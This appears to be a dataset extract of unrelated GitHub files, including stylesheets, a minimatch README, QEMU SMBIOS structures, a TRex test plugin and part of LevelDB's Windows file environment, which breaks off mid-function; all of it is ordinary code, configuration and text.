text
stringlengths 2
99k
| meta
dict |
---|---|
.row-split {
.col-content {
margin-top: 20px;
}
@media (min-width: @media-xs) {
display: flex;
flex-direction: row;
.col-side {
width: 360px;
}
.col-content {
flex-grow: 1;
margin-top: 0;
}
}
}
.palette-preview {
.rs-panel {
position: relative;
height: 578px;
}
}
.panel-color-wrap {
.panel-color {
th,
td {
text-align: left;
padding: 11px;
font-family: 'DejaVu Sans Mono';
}
}
}
.palette-logo-tool {
margin-top: 20px;
}
.palette-image-preview {
position: relative;
margin-top: 20px;
padding: 10px;
border-radius: 6px;
}
.palette-image-position-dot {
position: absolute;
background: #fff;
width: 8px;
height: 8px;
border-radius: 4px;
border: 1px solid #000;
}
.circle-picker-wrapper {
display: inline-block;
vertical-align: top;
}
.sketch-picker-wrapper {
margin-left: 20px;
display: inline-block;
position: relative;
.sketch-color-review {
padding: 5px;
background: rgb(255, 255, 255);
border-radius: 1px;
box-shadow: rgba(0, 0, 0, 0.1) 0px 0px 0px 1px;
display: inline-block;
cursor: pointer;
}
.sketch-color-value {
width: 68px;
height: 100px;
border-radius: 2px;
}
.sketch-picker-overlay {
position: absolute;
z-index: 2;
}
.sketch-picker-backdrop {
position: fixed;
top: 0px;
right: 0px;
bottom: 0px;
left: 0px;
}
}
| {
"pile_set_name": "Github"
} |
# minimatch
A minimal matching utility.
[![Build Status](https://secure.travis-ci.org/isaacs/minimatch.png)](http://travis-ci.org/isaacs/minimatch)
This is the matching library used internally by npm.
Eventually, it will replace the C binding in node-glob.
It works by converting glob expressions into JavaScript `RegExp`
objects.
## Usage
```javascript
var minimatch = require("minimatch")
minimatch("bar.foo", "*.foo") // true!
minimatch("bar.foo", "*.bar") // false!
minimatch("bar.foo", "*.+(bar|foo)", { debug: true }) // true, and noisy!
```
## Features
Supports these glob features:
* Brace Expansion
* Extended glob matching
* "Globstar" `**` matching
See:
* `man sh`
* `man bash`
* `man 3 fnmatch`
* `man 5 gitignore`
## Minimatch Class
Create a minimatch object by instanting the `minimatch.Minimatch` class.
```javascript
var Minimatch = require("minimatch").Minimatch
var mm = new Minimatch(pattern, options)
```
### Properties
* `pattern` The original pattern the minimatch object represents.
* `options` The options supplied to the constructor.
* `set` A 2-dimensional array of regexp or string expressions.
Each row in the
array corresponds to a brace-expanded pattern. Each item in the row
corresponds to a single path-part. For example, the pattern
`{a,b/c}/d` would expand to a set of patterns like:
[ [ a, d ]
, [ b, c, d ] ]
If a portion of the pattern doesn't have any "magic" in it
(that is, it's something like `"foo"` rather than `fo*o?`), then it
will be left as a string rather than converted to a regular
expression.
* `regexp` Created by the `makeRe` method. A single regular expression
expressing the entire pattern. This is useful in cases where you wish
to use the pattern somewhat like `fnmatch(3)` with `FNM_PATH` enabled.
* `negate` True if the pattern is negated.
* `comment` True if the pattern is a comment.
* `empty` True if the pattern is `""`.
### Methods
* `makeRe` Generate the `regexp` member if necessary, and return it.
Will return `false` if the pattern is invalid.
* `match(fname)` Return true if the filename matches the pattern, or
false otherwise.
* `matchOne(fileArray, patternArray, partial)` Take a `/`-split
filename, and match it against a single row in the `regExpSet`. This
method is mainly for internal use, but is exposed so that it can be
used by a glob-walker that needs to avoid excessive filesystem calls.
All other methods are internal, and will be called as necessary.
## Functions
The top-level exported function has a `cache` property, which is an LRU
cache set to store 100 items. So, calling these methods repeatedly
with the same pattern and options will use the same Minimatch object,
saving the cost of parsing it multiple times.
### minimatch(path, pattern, options)
Main export. Tests a path against the pattern using the options.
```javascript
var isJS = minimatch(file, "*.js", { matchBase: true })
```
### minimatch.filter(pattern, options)
Returns a function that tests its
supplied argument, suitable for use with `Array.filter`. Example:
```javascript
var javascripts = fileList.filter(minimatch.filter("*.js", {matchBase: true}))
```
### minimatch.match(list, pattern, options)
Match against the list of
files, in the style of fnmatch or glob. If nothing is matched, and
options.nonull is set, then return a list containing the pattern itself.
```javascript
var javascripts = minimatch.match(fileList, "*.js", {matchBase: true}))
```
### minimatch.makeRe(pattern, options)
Make a regular expression object from the pattern.
## Options
All options are `false` by default.
### debug
Dump a ton of stuff to stderr.
### nobrace
Do not expand `{a,b}` and `{1..3}` brace sets.
### noglobstar
Disable `**` matching against multiple folder names.
### dot
Allow patterns to match filenames starting with a period, even if
the pattern does not explicitly have a period in that spot.
Note that by default, `a/**/b` will **not** match `a/.d/b`, unless `dot`
is set.
### noext
Disable "extglob" style patterns like `+(a|b)`.
### nocase
Perform a case-insensitive match.
### nonull
When a match is not found by `minimatch.match`, return a list containing
the pattern itself. When set, an empty list is returned if there are
no matches.
### matchBase
If set, then patterns without slashes will be matched
against the basename of the path if it contains slashes. For example,
`a?b` would match the path `/xyz/123/acb`, but not `/xyz/acb/123`.
### nocomment
Suppress the behavior of treating `#` at the start of a pattern as a
comment.
### nonegate
Suppress the behavior of treating a leading `!` character as negation.
### flipNegate
Returns from negate expressions the same as if they were not negated.
(Ie, true on a hit, false on a miss.)
## Comparisons to other fnmatch/glob implementations
While strict compliance with the existing standards is a worthwhile
goal, some discrepancies exist between minimatch and other
implementations, and are intentional.
If the pattern starts with a `!` character, then it is negated. Set the
`nonegate` flag to suppress this behavior, and treat leading `!`
characters normally. This is perhaps relevant if you wish to start the
pattern with a negative extglob pattern like `!(a|B)`. Multiple `!`
characters at the start of a pattern will negate the pattern multiple
times.
If a pattern starts with `#`, then it is treated as a comment, and
will not match anything. Use `\#` to match a literal `#` at the
start of a line, or set the `nocomment` flag to suppress this behavior.
The double-star character `**` is supported by default, unless the
`noglobstar` flag is set. This is supported in the manner of bsdglob
and bash 4.1, where `**` only has special significance if it is the only
thing in a path part. That is, `a/**/b` will match `a/x/y/b`, but
`a/**b` will not.
If an escaped pattern has no matches, and the `nonull` flag is set,
then minimatch.match returns the pattern as-provided, rather than
interpreting the character escapes. For example,
`minimatch.match([], "\\*a\\?")` will return `"\\*a\\?"` rather than
`"*a?"`. This is akin to setting the `nullglob` option in bash, except
that it does not resolve escaped pattern characters.
If brace expansion is not disabled, then it is performed before any
other interpretation of the glob pattern. Thus, a pattern like
`+(a|{b),c)}`, which would not be valid in bash or zsh, is expanded
**first** into the set of `+(a|b)` and `+(a|c)`, and those patterns are
checked for validity. Since those two are valid, matching proceeds.
| {
"pile_set_name": "Github"
} |
/*
Copyright 2016 The Kubernetes Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package homedir
import (
"os"
"path/filepath"
"runtime"
)
// HomeDir returns the home directory for the current user.
// On Windows:
// 1. the first of %HOME%, %HOMEDRIVE%%HOMEPATH%, %USERPROFILE% containing a `.kube\config` file is returned.
// 2. if none of those locations contain a `.kube\config` file, the first of %HOME%, %USERPROFILE%, %HOMEDRIVE%%HOMEPATH% that exists and is writeable is returned.
// 3. if none of those locations are writeable, the first of %HOME%, %USERPROFILE%, %HOMEDRIVE%%HOMEPATH% that exists is returned.
// 4. if none of those locations exists, the first of %HOME%, %USERPROFILE%, %HOMEDRIVE%%HOMEPATH% that is set is returned.
func HomeDir() string {
if runtime.GOOS == "windows" {
home := os.Getenv("HOME")
homeDriveHomePath := ""
if homeDrive, homePath := os.Getenv("HOMEDRIVE"), os.Getenv("HOMEPATH"); len(homeDrive) > 0 && len(homePath) > 0 {
homeDriveHomePath = homeDrive + homePath
}
userProfile := os.Getenv("USERPROFILE")
// Return first of %HOME%, %HOMEDRIVE%/%HOMEPATH%, %USERPROFILE% that contains a `.kube\config` file.
// %HOMEDRIVE%/%HOMEPATH% is preferred over %USERPROFILE% for backwards-compatibility.
for _, p := range []string{home, homeDriveHomePath, userProfile} {
if len(p) == 0 {
continue
}
if _, err := os.Stat(filepath.Join(p, ".kube", "config")); err != nil {
continue
}
return p
}
firstSetPath := ""
firstExistingPath := ""
// Prefer %USERPROFILE% over %HOMEDRIVE%/%HOMEPATH% for compatibility with other auth-writing tools
for _, p := range []string{home, userProfile, homeDriveHomePath} {
if len(p) == 0 {
continue
}
if len(firstSetPath) == 0 {
// remember the first path that is set
firstSetPath = p
}
info, err := os.Stat(p)
if err != nil {
continue
}
if len(firstExistingPath) == 0 {
// remember the first path that exists
firstExistingPath = p
}
if info.IsDir() && info.Mode().Perm()&(1<<(uint(7))) != 0 {
// return first path that is writeable
return p
}
}
// If none are writeable, return first location that exists
if len(firstExistingPath) > 0 {
return firstExistingPath
}
// If none exist, return first location that is set
if len(firstSetPath) > 0 {
return firstSetPath
}
// We've got nothing
return ""
}
return os.Getenv("HOME")
}
| {
"pile_set_name": "Github"
} |
nelmio_cors:
defaults:
origin_regex: true
allow_origin: ['%env(CORS_ALLOW_ORIGIN)%']
allow_methods: ['GET', 'OPTIONS', 'POST', 'PUT', 'PATCH', 'DELETE']
allow_headers: ['Content-Type', 'Authorization', 'Preload', 'Fields']
expose_headers: ['Link']
max_age: 3600
paths:
'^/': null
| {
"pile_set_name": "Github"
} |
import { run } from '@ember/runloop';
import { module, test } from 'qunit';
import { setupRenderingTest } from 'ember-qunit';
import { render } from '@ember/test-helpers';
import setupStyles from '../helpers/render-with-styles';
module('Integration | Changing local classes', function(hooks) {
setupRenderingTest(hooks);
test('changing a dynamic class value works', async function(assert) {
const hbs = setupStyles({
foo: '--foo',
bar: '--bar',
baz: '--baz'
});
this.set('extraClass', 'bar');
await render(hbs`<div data-test-element class="global" local-class="foo {{extraClass}}"></div>`);
assert.dom('[data-test-element]').hasAttribute('class', 'global --foo --bar');
run(() => this.set('extraClass', 'baz'));
assert.dom('[data-test-element]').hasAttribute('class', 'global --foo --baz');
run(() => this.set('extraClass', 'qux'));
assert.dom('[data-test-element]').hasAttribute('class', 'global --foo');
});
});
| {
"pile_set_name": "Github"
} |
form=词
tags=
放扁舟、万山环处,
平铺碧浪千顷。
仙人怜我征尘久,
借与梦游清枕。
风乍静。
望两岸群峰,
倒浸玻璃影。
楼台相映。
更日薄烟轻,
荷花似醉,
飞鸟堕寒镜。
中都内,
罗绮千街万井。
天教此地幽胜。
仇池仙伯今何在,
堤柳几眠还醒。
君试问。
□此意、只今更有何人领。
功名未竟。
待学取鸱夷,
仍携西子,
来动五湖兴。
| {
"pile_set_name": "Github"
} |
{
"gender": "female",
"species": "ostrich",
"birthday": "7-31",
"games": {
"afe+": {
"personality": "snooty",
"clothes": "red-aloha-shirt",
"song": "K.K. Sonata"
},
"nl": {
"personality": "snooty",
"clothes": "purple-tie-dye-tee",
"song": "K.K. Sonata",
"phrase": "dahling",
"skill": "Computing",
"goal": "CEO",
"fear": "Mummy Mask",
"quote": "Cut once, measure twice... Wait- reverse that.",
"siblings": "Youngest triplet",
"favoriteStyle": "Basic",
"dislikedStyle": "Rock",
"favoriteColor": "Red",
"coffee": {
"beans": "Blue Mountain",
"milk": "Lots of milk",
"sugar": "3 spoonfuls of sugar"
}
},
"nh": {
"personality": "snooty",
"phrase": "dahling",
"song": "K.K. Sonata"
}
},
"name": "Julia",
"id": "julia"
} | {
"pile_set_name": "Github"
} |
fileFormatVersion: 2
guid: 91035448860ba4e708919485c73f7edc
timeCreated: 1442945121
licenseType: Pro
NativeFormatImporter:
userData:
assetBundleName:
assetBundleVariant:
| {
"pile_set_name": "Github"
} |
#ifndef QEMU_SMBIOS_H
#define QEMU_SMBIOS_H
/*
* SMBIOS Support
*
* Copyright (C) 2009 Hewlett-Packard Development Company, L.P.
*
* Authors:
* Alex Williamson <alex.williamson@hp.com>
*
* This work is licensed under the terms of the GNU GPL, version 2. See
* the COPYING file in the top-level directory.
*
*/
#include "qemu/option.h"
#define SMBIOS_MAX_TYPE 127
/* memory area description, used by type 19 table */
struct smbios_phys_mem_area {
uint64_t address;
uint64_t length;
};
/*
* SMBIOS spec defined tables
*/
typedef enum SmbiosEntryPointType {
SMBIOS_ENTRY_POINT_21,
SMBIOS_ENTRY_POINT_30,
} SmbiosEntryPointType;
/* SMBIOS Entry Point
* There are two types of entry points defined in the SMBIOS specification
* (see below). BIOS must place the entry point(s) at a 16-byte-aligned
* address between 0xf0000 and 0xfffff. Note that either entry point type
* can be used in a 64-bit target system, except that SMBIOS 2.1 entry point
* only allows the SMBIOS struct table to reside below 4GB address space.
*/
/* SMBIOS 2.1 (32-bit) Entry Point
* - introduced since SMBIOS 2.1
* - supports structure table below 4GB only
*/
struct smbios_21_entry_point {
uint8_t anchor_string[4];
uint8_t checksum;
uint8_t length;
uint8_t smbios_major_version;
uint8_t smbios_minor_version;
uint16_t max_structure_size;
uint8_t entry_point_revision;
uint8_t formatted_area[5];
uint8_t intermediate_anchor_string[5];
uint8_t intermediate_checksum;
uint16_t structure_table_length;
uint32_t structure_table_address;
uint16_t number_of_structures;
uint8_t smbios_bcd_revision;
} QEMU_PACKED;
/* SMBIOS 3.0 (64-bit) Entry Point
* - introduced since SMBIOS 3.0
* - supports structure table at 64-bit address space
*/
struct smbios_30_entry_point {
uint8_t anchor_string[5];
uint8_t checksum;
uint8_t length;
uint8_t smbios_major_version;
uint8_t smbios_minor_version;
uint8_t smbios_doc_rev;
uint8_t entry_point_revision;
uint8_t reserved;
uint32_t structure_table_max_size;
uint64_t structure_table_address;
} QEMU_PACKED;
typedef union {
struct smbios_21_entry_point ep21;
struct smbios_30_entry_point ep30;
} QEMU_PACKED SmbiosEntryPoint;
/* This goes at the beginning of every SMBIOS structure. */
struct smbios_structure_header {
uint8_t type;
uint8_t length;
uint16_t handle;
} QEMU_PACKED;
/* SMBIOS type 0 - BIOS Information */
struct smbios_type_0 {
struct smbios_structure_header header;
uint8_t vendor_str;
uint8_t bios_version_str;
uint16_t bios_starting_address_segment;
uint8_t bios_release_date_str;
uint8_t bios_rom_size;
uint64_t bios_characteristics;
uint8_t bios_characteristics_extension_bytes[2];
uint8_t system_bios_major_release;
uint8_t system_bios_minor_release;
uint8_t embedded_controller_major_release;
uint8_t embedded_controller_minor_release;
} QEMU_PACKED;
/* UUID encoding. The time_* fields are little-endian, as specified by SMBIOS
* version 2.6.
*/
struct smbios_uuid {
uint32_t time_low;
uint16_t time_mid;
uint16_t time_hi_and_version;
uint8_t clock_seq_hi_and_reserved;
uint8_t clock_seq_low;
uint8_t node[6];
} QEMU_PACKED;
/* SMBIOS type 1 - System Information */
struct smbios_type_1 {
struct smbios_structure_header header;
uint8_t manufacturer_str;
uint8_t product_name_str;
uint8_t version_str;
uint8_t serial_number_str;
struct smbios_uuid uuid;
uint8_t wake_up_type;
uint8_t sku_number_str;
uint8_t family_str;
} QEMU_PACKED;
/* SMBIOS type 2 - Base Board */
struct smbios_type_2 {
struct smbios_structure_header header;
uint8_t manufacturer_str;
uint8_t product_str;
uint8_t version_str;
uint8_t serial_number_str;
uint8_t asset_tag_number_str;
uint8_t feature_flags;
uint8_t location_str;
uint16_t chassis_handle;
uint8_t board_type;
uint8_t contained_element_count;
/* contained elements follow */
} QEMU_PACKED;
/* SMBIOS type 3 - System Enclosure (v2.7) */
struct smbios_type_3 {
struct smbios_structure_header header;
uint8_t manufacturer_str;
uint8_t type;
uint8_t version_str;
uint8_t serial_number_str;
uint8_t asset_tag_number_str;
uint8_t boot_up_state;
uint8_t power_supply_state;
uint8_t thermal_state;
uint8_t security_status;
uint32_t oem_defined;
uint8_t height;
uint8_t number_of_power_cords;
uint8_t contained_element_count;
uint8_t sku_number_str;
/* contained elements follow */
} QEMU_PACKED;
/* SMBIOS type 4 - Processor Information (v2.6) */
struct smbios_type_4 {
struct smbios_structure_header header;
uint8_t socket_designation_str;
uint8_t processor_type;
uint8_t processor_family;
uint8_t processor_manufacturer_str;
uint32_t processor_id[2];
uint8_t processor_version_str;
uint8_t voltage;
uint16_t external_clock;
uint16_t max_speed;
uint16_t current_speed;
uint8_t status;
uint8_t processor_upgrade;
uint16_t l1_cache_handle;
uint16_t l2_cache_handle;
uint16_t l3_cache_handle;
uint8_t serial_number_str;
uint8_t asset_tag_number_str;
uint8_t part_number_str;
uint8_t core_count;
uint8_t core_enabled;
uint8_t thread_count;
uint16_t processor_characteristics;
uint16_t processor_family2;
} QEMU_PACKED;
/* SMBIOS type 16 - Physical Memory Array (v2.7) */
struct smbios_type_16 {
struct smbios_structure_header header;
uint8_t location;
uint8_t use;
uint8_t error_correction;
uint32_t maximum_capacity;
uint16_t memory_error_information_handle;
uint16_t number_of_memory_devices;
uint64_t extended_maximum_capacity;
} QEMU_PACKED;
/* SMBIOS type 17 - Memory Device (v2.8) */
struct smbios_type_17 {
struct smbios_structure_header header;
uint16_t physical_memory_array_handle;
uint16_t memory_error_information_handle;
uint16_t total_width;
uint16_t data_width;
uint16_t size;
uint8_t form_factor;
uint8_t device_set;
uint8_t device_locator_str;
uint8_t bank_locator_str;
uint8_t memory_type;
uint16_t type_detail;
uint16_t speed;
uint8_t manufacturer_str;
uint8_t serial_number_str;
uint8_t asset_tag_number_str;
uint8_t part_number_str;
uint8_t attributes;
uint32_t extended_size;
uint16_t configured_clock_speed;
uint16_t minimum_voltage;
uint16_t maximum_voltage;
uint16_t configured_voltage;
} QEMU_PACKED;
/* SMBIOS type 19 - Memory Array Mapped Address (v2.7) */
struct smbios_type_19 {
struct smbios_structure_header header;
uint32_t starting_address;
uint32_t ending_address;
uint16_t memory_array_handle;
uint8_t partition_width;
uint64_t extended_starting_address;
uint64_t extended_ending_address;
} QEMU_PACKED;
/* SMBIOS type 32 - System Boot Information */
struct smbios_type_32 {
struct smbios_structure_header header;
uint8_t reserved[6];
uint8_t boot_status;
} QEMU_PACKED;
/* SMBIOS type 127 -- End-of-table */
struct smbios_type_127 {
struct smbios_structure_header header;
} QEMU_PACKED;
void smbios_entry_add(QemuOpts *opts);
void smbios_set_cpuid(uint32_t version, uint32_t features);
void smbios_set_defaults(const char *manufacturer, const char *product,
const char *version, bool legacy_mode,
bool uuid_encoded, SmbiosEntryPointType ep_type);
uint8_t *smbios_get_table_legacy(size_t *length);
void smbios_get_tables(const struct smbios_phys_mem_area *mem_array,
const unsigned int mem_array_size,
uint8_t **tables, size_t *tables_len,
uint8_t **anchor, size_t *anchor_len);
#endif /* QEMU_SMBIOS_H */
| {
"pile_set_name": "Github"
} |
import astf_path
class ErrorLogger():
def __init__(self, name, allowed_errors):
self.iteration_counter = 0
self.name = name
self.client_allowed_errors = set(allowed_errors['client'])
self.server_allowed_errors = set(allowed_errors['server'])
self.iteration_to_mult_map = {}
self.iteration_to_error_map = {}
def increment_iteration_counter(self):
self.iteration_counter += 1
def log(self, errors):
self.iteration_to_error_map[self.iteration_counter] = errors
def log_multiplier(self, mult):
self.iteration_to_mult_map[self.iteration_counter] = mult
def should_stop(self):
return self.iteration_counter == 5
def invalid_errors(self, errors):
client_errors = set(errors.get('client', []))
server_errors = set(errors.get('server', []))
return not (client_errors.issubset(self.client_allowed_errors) and server_errors.issubset(self.server_allowed_errors))
class ErrorLoggingNDRPlugin():
def __init__(self, **kwargs):
allowed_errors = {'client': {u'tcps_conndrops': u'embryonic connections dropped'},
'server': {u'err_no_template': u"server can't match L7 template",
u'err_no_syn': u'server first flow packet with no SYN'}
}
self.logger = ErrorLogger(name="Plugin Demonstration for ASTF NDR", allowed_errors=allowed_errors)
def pre_iteration(self, run_results=None, **kwargs):
pass
def post_iteration(self, run_results, **kwargs):
if run_results['error_flag']:
self.logger.log(run_results['errors'])
self.logger.log_multiplier(run_results['mult'])
self.logger.increment_iteration_counter()
should_stop = self.logger.should_stop()
invalid_errors = self.logger.invalid_errors(run_results['errors'])
return should_stop, invalid_errors
# dynamic load of python module
def register():
return ErrorLoggingNDRPlugin()
| {
"pile_set_name": "Github"
} |
// Copyright (c) 2018 The LevelDB Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file. See the AUTHORS file for names of contributors.
// Prevent Windows headers from defining min/max macros and instead
// use STL.
#ifndef NOMINMAX
#define NOMINMAX
#endif // ifndef NOMINMAX
#include <windows.h>
#include <algorithm>
#include <atomic>
#include <chrono>
#include <condition_variable>
#include <cstddef>
#include <cstdint>
#include <cstdlib>
#include <cstring>
#include <memory>
#include <mutex>
#include <queue>
#include <sstream>
#include <string>
#include <vector>
#include "leveldb/env.h"
#include "leveldb/slice.h"
#include "port/port.h"
#include "port/thread_annotations.h"
#include "util/env_windows_test_helper.h"
#include "util/logging.h"
#include "util/mutexlock.h"
#include "util/windows_logger.h"
namespace leveldb {
namespace {
constexpr const size_t kWritableFileBufferSize = 65536;
// Up to 1000 mmaps for 64-bit binaries; none for 32-bit.
constexpr int kDefaultMmapLimit = (sizeof(void*) >= 8) ? 1000 : 0;
// Can be set by by EnvWindowsTestHelper::SetReadOnlyMMapLimit().
int g_mmap_limit = kDefaultMmapLimit;
std::string GetWindowsErrorMessage(DWORD error_code) {
std::string message;
char* error_text = nullptr;
// Use MBCS version of FormatMessage to match return value.
size_t error_text_size = ::FormatMessageA(
FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_ALLOCATE_BUFFER |
FORMAT_MESSAGE_IGNORE_INSERTS,
nullptr, error_code, MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
reinterpret_cast<char*>(&error_text), 0, nullptr);
if (!error_text) {
return message;
}
message.assign(error_text, error_text_size);
::LocalFree(error_text);
return message;
}
Status WindowsError(const std::string& context, DWORD error_code) {
if (error_code == ERROR_FILE_NOT_FOUND || error_code == ERROR_PATH_NOT_FOUND)
return Status::NotFound(context, GetWindowsErrorMessage(error_code));
return Status::IOError(context, GetWindowsErrorMessage(error_code));
}
class ScopedHandle {
public:
ScopedHandle(HANDLE handle) : handle_(handle) {}
ScopedHandle(const ScopedHandle&) = delete;
ScopedHandle(ScopedHandle&& other) noexcept : handle_(other.Release()) {}
~ScopedHandle() { Close(); }
ScopedHandle& operator=(const ScopedHandle&) = delete;
ScopedHandle& operator=(ScopedHandle&& rhs) noexcept {
if (this != &rhs) handle_ = rhs.Release();
return *this;
}
bool Close() {
if (!is_valid()) {
return true;
}
HANDLE h = handle_;
handle_ = INVALID_HANDLE_VALUE;
return ::CloseHandle(h);
}
bool is_valid() const {
return handle_ != INVALID_HANDLE_VALUE && handle_ != nullptr;
}
HANDLE get() const { return handle_; }
HANDLE Release() {
HANDLE h = handle_;
handle_ = INVALID_HANDLE_VALUE;
return h;
}
private:
HANDLE handle_;
};
// Helper class to limit resource usage to avoid exhaustion.
// Currently used to limit read-only file descriptors and mmap file usage
// so that we do not run out of file descriptors or virtual memory, or run into
// kernel performance problems for very large databases.
class Limiter {
public:
// Limit maximum number of resources to |max_acquires|.
Limiter(int max_acquires) : acquires_allowed_(max_acquires) {}
Limiter(const Limiter&) = delete;
Limiter operator=(const Limiter&) = delete;
// If another resource is available, acquire it and return true.
// Else return false.
bool Acquire() {
int old_acquires_allowed =
acquires_allowed_.fetch_sub(1, std::memory_order_relaxed);
if (old_acquires_allowed > 0) return true;
acquires_allowed_.fetch_add(1, std::memory_order_relaxed);
return false;
}
// Release a resource acquired by a previous call to Acquire() that returned
// true.
void Release() { acquires_allowed_.fetch_add(1, std::memory_order_relaxed); }
private:
// The number of available resources.
//
// This is a counter and is not tied to the invariants of any other class, so
// it can be operated on safely using std::memory_order_relaxed.
std::atomic<int> acquires_allowed_;
};
class WindowsSequentialFile : public SequentialFile {
public:
WindowsSequentialFile(std::string filename, ScopedHandle handle)
: handle_(std::move(handle)), filename_(std::move(filename)) {}
~WindowsSequentialFile() override {}
Status Read(size_t n, Slice* result, char* scratch) override {
DWORD bytes_read;
// DWORD is 32-bit, but size_t could technically be larger. However leveldb
// files are limited to leveldb::Options::max_file_size which is clamped to
// 1<<30 or 1 GiB.
assert(n <= std::numeric_limits<DWORD>::max());
if (!::ReadFile(handle_.get(), scratch, static_cast<DWORD>(n), &bytes_read,
nullptr)) {
return WindowsError(filename_, ::GetLastError());
}
*result = Slice(scratch, bytes_read);
return Status::OK();
}
Status Skip(uint64_t n) override {
LARGE_INTEGER distance;
distance.QuadPart = n;
if (!::SetFilePointerEx(handle_.get(), distance, nullptr, FILE_CURRENT)) {
return WindowsError(filename_, ::GetLastError());
}
return Status::OK();
}
private:
const ScopedHandle handle_;
const std::string filename_;
};
class WindowsRandomAccessFile : public RandomAccessFile {
public:
WindowsRandomAccessFile(std::string filename, ScopedHandle handle)
: handle_(std::move(handle)), filename_(std::move(filename)) {}
~WindowsRandomAccessFile() override = default;
Status Read(uint64_t offset, size_t n, Slice* result,
char* scratch) const override {
DWORD bytes_read = 0;
OVERLAPPED overlapped = {0};
overlapped.OffsetHigh = static_cast<DWORD>(offset >> 32);
overlapped.Offset = static_cast<DWORD>(offset);
if (!::ReadFile(handle_.get(), scratch, static_cast<DWORD>(n), &bytes_read,
&overlapped)) {
DWORD error_code = ::GetLastError();
if (error_code != ERROR_HANDLE_EOF) {
*result = Slice(scratch, 0);
return Status::IOError(filename_, GetWindowsErrorMessage(error_code));
}
}
*result = Slice(scratch, bytes_read);
return Status::OK();
}
private:
const ScopedHandle handle_;
const std::string filename_;
};
class WindowsMmapReadableFile : public RandomAccessFile {
public:
// base[0,length-1] contains the mmapped contents of the file.
WindowsMmapReadableFile(std::string filename, char* mmap_base, size_t length,
Limiter* mmap_limiter)
: mmap_base_(mmap_base),
length_(length),
mmap_limiter_(mmap_limiter),
filename_(std::move(filename)) {}
~WindowsMmapReadableFile() override {
::UnmapViewOfFile(mmap_base_);
mmap_limiter_->Release();
}
Status Read(uint64_t offset, size_t n, Slice* result,
char* scratch) const override {
if (offset + n > length_) {
*result = Slice();
return WindowsError(filename_, ERROR_INVALID_PARAMETER);
}
*result = Slice(mmap_base_ + offset, n);
return Status::OK();
}
private:
char* const mmap_base_;
const size_t length_;
Limiter* const mmap_limiter_;
const std::string filename_;
};
class WindowsWritableFile : public WritableFile {
public:
WindowsWritableFile(std::string filename, ScopedHandle handle)
: pos_(0), handle_(std::move(handle)), filename_(std::move(filename)) {}
~WindowsWritableFile() override = default;
Status Append(const Slice& data) override {
size_t write_size = data.size();
const char* write_data = data.data();
// Fit as much as possible into buffer.
size_t copy_size = std::min(write_size, kWritableFileBufferSize - pos_);
std::memcpy(buf_ + pos_, write_data, copy_size);
write_data += copy_size;
write_size -= copy_size;
pos_ += copy_size;
if (write_size == 0) {
return Status::OK();
}
// Can't fit in buffer, so need to do at least one write.
Status status = FlushBuffer();
if (!status.ok()) {
return status;
}
// Small writes go to buffer, large writes are written directly.
if (write_size < kWritableFileBufferSize) {
std::memcpy(buf_, write_data, write_size);
pos_ = write_size;
return Status::OK();
}
return WriteUnbuffered(write_data, write_size);
}
Status Close() override {
Status status = FlushBuffer();
if (!handle_.Close() && status.ok()) {
status = WindowsError(filename_, ::GetLastError());
}
return status;
}
Status Flush() override { return FlushBuffer(); }
Status Sync() override {
// On Windows no need to sync parent directory. Its metadata will be updated
// via the creation of the new file, without an explicit sync.
Status status = FlushBuffer();
if (!status.ok()) {
return status;
}
if (!::FlushFileBuffers(handle_.get())) {
return Status::IOError(filename_,
GetWindowsErrorMessage(::GetLastError()));
}
return Status::OK();
}
private:
Status FlushBuffer() {
Status status = WriteUnbuffered(buf_, pos_);
pos_ = 0;
return status;
}
Status WriteUnbuffered(const char* data, size_t size) {
DWORD bytes_written;
if (!::WriteFile(handle_.get(), data, static_cast<DWORD>(size),
&bytes_written, nullptr)) {
return Status::IOError(filename_,
GetWindowsErrorMessage(::GetLastError()));
}
return Status::OK();
}
// buf_[0, pos_-1] contains data to be written to handle_.
char buf_[kWritableFileBufferSize];
size_t pos_;
ScopedHandle handle_;
const std::string filename_;
};
// Lock or unlock the entire file as specified by |lock|. Returns true
// when successful, false upon failure. Caller should call ::GetLastError()
// to determine cause of failure
bool LockOrUnlock(HANDLE handle, bool lock) {
if (lock) {
return ::LockFile(handle,
/*dwFileOffsetLow=*/0, /*dwFileOffsetHigh=*/0,
/*nNumberOfBytesToLockLow=*/MAXDWORD,
/*nNumberOfBytesToLockHigh=*/MAXDWORD);
} else {
return ::UnlockFile(handle,
/*dwFileOffsetLow=*/0, /*dwFileOffsetHigh=*/0,
/*nNumberOfBytesToLockLow=*/MAXDWORD,
/*nNumberOfBytesToLockHigh=*/MAXDWORD);
}
}
class WindowsFileLock : public FileLock {
public:
WindowsFileLock(ScopedHandle handle, std::string filename)
: handle_(std::move(handle)), filename_(std::move(filename)) {}
const ScopedHandle& handle() const { return handle_; }
const std::string& filename() const { return filename_; }
private:
const ScopedHandle handle_;
const std::string filename_;
};
class WindowsEnv : public Env {
public:
WindowsEnv();
~WindowsEnv() override {
static const char msg[] =
"WindowsEnv singleton destroyed. Unsupported behavior!\n";
std::fwrite(msg, 1, sizeof(msg), stderr);
std::abort();
}
Status NewSequentialFile(const std::string& filename,
SequentialFile** result) override {
*result = nullptr;
DWORD desired_access = GENERIC_READ;
DWORD share_mode = FILE_SHARE_READ;
ScopedHandle handle = ::CreateFileA(
filename.c_str(), desired_access, share_mode,
/*lpSecurityAttributes=*/nullptr, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL,
/*hTemplateFile=*/nullptr);
if (!handle.is_valid()) {
return WindowsError(filename, ::GetLastError());
}
*result = new WindowsSequentialFile(filename, std::move(handle));
return Status::OK();
}
Status NewRandomAccessFile(const std::string& filename,
RandomAccessFile** result) override {
*result = nullptr;
DWORD desired_access = GENERIC_READ;
DWORD share_mode = FILE_SHARE_READ;
ScopedHandle handle =
::CreateFileA(filename.c_str(), desired_access, share_mode,
/*lpSecurityAttributes=*/nullptr, OPEN_EXISTING,
FILE_ATTRIBUTE_READONLY,
/*hTemplateFile=*/nullptr);
if (!handle.is_valid()) {
